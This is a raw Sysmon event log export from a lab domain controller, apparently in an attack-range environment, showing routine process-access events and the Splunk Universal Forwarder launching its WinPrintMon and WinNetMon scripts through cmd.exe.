13:36:39.609{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004080Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:39.609{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004079Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.609{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8EE7-6005-D800-00000000A301}5032C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004078Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.609{59A5CD1D-8EE3-6005-B100-00000000A301}41242852C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EE7-6005-D800-00000000A301}5032C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004077Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.611{59A5CD1D-8EE7-6005-D800-00000000A301}5032C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinPrintMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004076Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:39.500{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE7-6005-D700-00000000A301}4592C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004075Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.500{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004074Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:39.500{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004073Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.500{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004072Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:39.500{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004071Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.500{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004070Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:39.500{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004069Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.500{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004068Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:39.500{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004067Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.500{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004066Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:39.500{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EE7-6005-D700-00000000A301}4592C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004065Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.500{59A5CD1D-8EE3-6005-B100-00000000A301}41242852C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EE7-6005-D700-00000000A301}4592C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004064Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.501{59A5CD1D-8EE7-6005-D700-00000000A301}4592C:\Windows\System32\cmd.exe10.0.14393.0 
(rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinNetMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004063Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.390{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE7-6005-D600-00000000A301}1808C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004062Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:39.390{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004061Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.390{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004060Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:39.390{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004059Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.390{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004058Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:39.390{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004057Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.390{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004056Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:39.390{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004055Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 